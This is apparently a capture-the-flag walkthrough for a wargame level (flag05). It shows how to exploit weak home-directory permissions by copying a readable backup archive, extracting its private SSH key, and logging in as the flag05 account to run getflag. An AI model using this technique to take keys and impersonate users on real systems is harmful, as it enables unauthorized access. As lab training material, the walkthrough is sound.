Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
cd /home/flag05 ls -la ls -la .backup cp backup-19072011.tgz ~ cd tar xvfz backup-19072011.tgz cd .ssh ssh -i id_rsa flag05@localhost getflag
You have successfully executed getflag on a target account.